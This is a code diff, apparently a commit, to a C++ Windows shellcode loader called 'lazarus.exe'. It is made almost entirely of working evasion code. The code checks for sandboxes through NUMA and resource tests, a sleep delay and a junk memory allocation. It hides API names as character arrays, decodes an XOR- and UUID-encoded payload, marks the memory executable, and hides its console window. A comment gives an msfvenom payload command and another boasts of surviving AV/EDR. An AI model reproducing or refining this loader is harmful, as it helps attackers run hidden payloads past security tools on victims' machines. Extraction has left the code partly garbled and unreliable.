11#include < windows.h>
2+
3+ // ------------------
24#include < cstdio>
35#include < cstdlib>
46#include < cstring>
1012
1113#define EXE_NAME " lazarus.exe"
1214
15+ #define LOTS_OF_MEM 250'000'000
16+
17+ // the MAGICAL( but random ) byte
18+ #define MAGIC_BYTE 0xf1
19+
1320// Uncomment the line below if you're using Visual Studio for compiling.
1421// #pragma comment(lib, "Rpcrt4.lib")
1522
@@ -22,8 +29,9 @@ typedef LPVOID(WINAPI *pVirtualAllocExNuma)(HANDLE hProcess, LPVOID lpAddress, S
2229bool checkNUMA ()
2330{
2431 LPVOID mem{NULL };
25- const char k32DllName[13 ]{ ' k' ' e' ' r' ' n' ' e' ' l' ' 3' ' 2' ' .' ' d' ' l' ' l' 0x0 };
26- const char vAllocExNuma[19 ]{ ' V' ' i' ' r' ' t' ' u' ' a' ' l' ' A' ' l' ' l' ' o' ' c' ' E' ' x' ' N' ' u' ' m' ' a' 0x0 };
32+ const char k32DllName[13 ]{' k' ' e' ' r' ' n' ' e' ' l' ' 3' ' 2' ' .' ' d' ' l' ' l' 0x0 };
33+ const char vAllocExNuma[19 ]{' V' ' i' ' r' ' t' ' u' ' a' ' l' ' A' ' l' ' l'
34+ ' o' ' c' ' E' ' x' ' N' ' u' ' m' ' a' 0x0 };
2735 pVirtualAllocExNuma myVirtualAllocExNuma =
2836 (pVirtualAllocExNuma)GetProcAddress (GetModuleHandle (k32DllName), vAllocExNuma);
2937 mem =
@@ -59,28 +67,15 @@ bool checkResources()
5967 return true ;
6068}
6169
62- void XOR (char *data, unsigned long data_len, char *key, unsigned long key_len)
70+ void XOR (BYTE *data, unsigned long data_len, char *key, unsigned long key_len)
6371{
64- for (int i{0 }; i < data_len; ++i)
65- {
72+ for (unsigned long i{0x0 }; i < data_len; ++i)
6673 data[i] ^= key[i % key_len];
67- }
68- }
69-
70- int getposition (unsigned char array[], size_t size)
71- {
72- for (int i{0 }; i < size; i++)
73- {
74- if (array[i] == ' ,'
75- {
76- return i;
77- }
78- }
79- return 0 ;
8074}
8175
8276int main (int argc, char *argv[])
8377{
78+ FreeConsole ();
8479
8580 // payload generation:
8681 // 1. msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
@@ -149,11 +144,19 @@ int main(int argc, char *argv[])
149144 return -2 ;
150145 }
151146
147+ const char virtProt[15 ] = {' V' ' i' ' r' ' t' ' u' ' a' ' l' ' P' ' r' ' o' ' t' ' e' ' c' ' t' 0x0 };
148+
152149 Sleep (7500 ); // you could use "ekko" by crack5pider for this, i'm still lazy for this
153150
154- char *mem{(char *)malloc (100000000 )};
155- if (mem != NULL )
151+ const char k32DllName[13 ]{' k' ' e' ' r' ' n' ' e' ' l' ' 3' ' 2' ' .' ' d' ' l' ' l' 0x0 };
152+ const char vAlloc[13 ]{' V' ' i' ' r' ' t' ' u' ' a' ' l' ' A' ' l' ' l' ' o' ' c' 0x0 };
153+
154+ BYTE *junk_mem{(BYTE *)malloc (LOTS_OF_MEM)};
155+ if (junk_mem)
156156 {
157+ memset (junk_mem, MAGIC_BYTE, LOTS_OF_MEM);
158+ free (junk_mem);
159+
157160#if DEBUG
158161 printf (" Before xor: %s\n\n "
159162#endif
@@ -186,21 +189,16 @@ int main(int argc, char *argv[])
186189 RPC_STATUS status = UuidFromStringA ((RPC_CSTR)rcp_cstr, (UUID *)hptr);
187190 if (status != RPC_S_OK)
188191 {
189- printf (" [-] UUID convert error\n "
192+ fprintf (stderr, " [-] UUID conversion error: try to make sure your XOR keys match or "
193+ " correct the way you set up the payload.\n "
190194 CloseHandle (mem);
191- return -1 ;
192- }
193- int pos{getposition (payload, sizeof (payload))};
194- if (pos > 0 )
195- {
196- pos += 2 ;
197- int gap{sizeof (payload) - pos};
198- memcpy (payload, &payload[pos], gap);
195+ return EXIT_FAILURE;
199196 }
197+
200198 hptr += 16 ;
199+ temp = strtok (NULL , " \n "
201200 }
202201
203- const char virtProt[15 ] = { ' V' ' i' ' r' ' t' ' u' ' a' ' l' ' P' ' r' ' o' ' t' ' e' ' c' ' t' 0x0 };
204202 pMVP = GetProcAddress (k32_handle, virtProt);
205203 rv = pMVP (mem, 0x100000 , PAGE_EXECUTE_READ, &oldprotect);
206204 if (!rv)
@@ -221,6 +219,6 @@ int main(int argc, char *argv[])
221219 }
222220 else
223221 {
224- return EXIT_FAILURE;
222+ return EXIT_FAILURE; // survived that AV/EDR. Phew!!
225223 }
226224}
0 commit comments